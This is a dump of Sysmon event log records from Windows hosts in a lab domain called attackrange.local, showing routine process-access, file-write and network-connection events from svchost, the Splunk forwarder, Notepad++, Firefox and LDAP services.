10341000x80000000000000001050089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:16.908{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001050086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.628{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21D99C6BC94E8F333ADFB05DC58AEE40,SHA256=CD0FEAC43C246443B05DD9EF138866F0A634434E0EA44B6E3119754579307D20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808061Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:16.253{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1B62ED2A4EAFCF50A30DA851FBCFB7A,SHA256=C489E32B8554D846CCA685AACE91B65938A4B7BE25D3B8CDADAF353757534CC7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:07.961{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51070-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001050084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:07.961{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51070-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001050103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:17.937{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=831176F4BF7F3DD2266B04BEC483495E,SHA256=3D6429409C9B9C3ADA5EA4E726EA222D45E1904BF4F798745D2C5049B86362A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:17.636{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85B61B01BC7D40FDDF7531E3B5C6AE72,SHA256=3225887FA7B678D5E982A57781F1651AD3AC59B8AA4E553BBAD87208BB43C011,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808062Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:17.268{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CCFBDC6B68D9D2DFE91945764B2300E,SHA256=A6FB43C6B6A6E29A1CDA3D143BDFEF34302B9EDEF8B2F71A310D3D32F95667D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:18.670{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5110FBA90919F4E919F03261469592A,SHA256=03849FAB8D40862AB3B3E21755D0E5133E960735B7360A2AA6659B106DB2B292,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808064Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:17.198{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57303-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808063Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:18.300{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69E14C619A8C7CA3DF9BD2E34F9E36DA,SHA256=6A58DB4CC69E7C46A671037CC746A5644C2F0102CAEC9198BAE57EC6550BC1EF,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:18.353{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:19.686{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C17EFCAF81C1C9D10315552E9FF974E3,SHA256=3F8EDFC05BFA6500D321FDBACC4074429F789D229CEA64488E750D4FC72FDAEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808065Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:19.378{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC6CB411235BA1E152EE406774C398BB,SHA256=77DFBA248E8C21B1F8732975ECEF336D8DAA5B0B1C2B3D3EDD94137888D638B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:10.718{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51071-false10.0.1.12-8000- 
23542300x80000000000000001050108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:20.716{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49879AB4CA8664870917398B8C96D782,SHA256=DE1351C3F1AB8678535C2FA3323DBC4E2B5E9C62995A0AFE211C4A63216EF135,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808067Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:20.565{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808066Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:20.393{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2A3A4546A565ED134408C63FC2FE1BE,SHA256=B6AA56E3EA0A3E6DE82825D6755813A569C83EFBA92800AA34FEBCDD4C2283C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:21.734{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A2DA497A9669F404DBE4650BAEC7110,SHA256=291A75E05C9C323300C524D0412A83E1BD5EB714B56E914C097DCDC138528190,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808069Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:20.698{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57304-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000808068Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:21.409{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8E29255458957F0B81AA1D90FADAB26,SHA256=835FC1E1313DAA228AA5FB5859D0F400BC1640A6A6A59A8175BA2FAAE9CCDE48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:22.752{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25884AA706AD2E2856C078BBF9F4EBD0,SHA256=2B204A156FB41CA305124896EA113CE6DBA16A182D3E73529BDD31654DBDBD3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808070Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:22.440{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8E777A1320D8CEF798CDB9305DEB76C,SHA256=6D2BA678B5B032316EC4A14467F27B4592711EC72699FB6F04BBE6942B8256A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:23.782{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB2FF7CE6F97E8E86E5F254591EF2131,SHA256=0D7ED5D9ED03755A5118C7DE952D9E75BF4CA8E63ECC50ED317FB9D28DADFA58,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808072Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:22.276{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57305-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808071Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:23.503{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37A3C6AF6E21C89E96354CFEF6D23F18,SHA256=66F5F923E971A0A23AE653BA97B88A909BDAF6941A7B95802BF9DCF43754B008,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:24.949{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program 
Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075517MD5=CC2472A6D52F4D09907DBB98C427ADEF,SHA256=AECCDDE15BA32EBE7071DFC18D9BA09D2D640C2F1F83A2B3C4AF097B0E733AB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:24.797{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51EB428A063C9F164F4AD7084BC69D7D,SHA256=EBBC508D0A45ED61A239F151BF08ED212B7CC5168EB8260D1AA1FE6EE65A4321,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808099Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808098Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808097Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808096Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808095Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808094Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808093Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808092Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 